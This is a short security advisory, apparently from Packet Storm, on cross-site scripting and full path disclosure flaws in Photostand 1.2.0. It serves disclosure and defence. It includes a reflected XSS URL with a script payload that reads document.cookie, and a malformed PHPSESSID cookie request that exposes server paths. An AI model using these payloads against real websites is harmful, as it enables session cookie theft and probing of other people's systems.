Photostand version 1.2.0 suffers from multiple cross site scripting vulnerabilities.
2d9f1ac802579e3d728f4e09487463c8e1dc0732380ae4ba86e9ca2d450ed9f3Photostand_1.2.0 Multiple Cross Site Scripting
Vendor site : http://www.photostand.org/
Global risk : medium
XSS
-----
+ Permanents
Message & name fields are vulnerable to xss attacks. This kind of xss
are pretty dangerous,because anyone who see the page gone get his cookie
stolen and sended to the attackers
+ Non Permanant
index.php?page=search&q=<script>alert(document.cookie)</script>
Full Path Disclorure -
-----------------------
"PHPSESSID='" will returns the full path of the file.
GET /photostand_1.2.0/ HTTP/1.0
[...]
Cookie: PS_STATS_VT=true;PS_STATS_VR=true;PHPSESSID=';style=[blahblah]path=/
[...]
/photostand_1.2.0/index.php?page=article&id=' too.
Solutions : www.php.net/htmlentities
regards,
Simon Bonnard
contact : simon.itsecurity - at - gmail - dot- com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed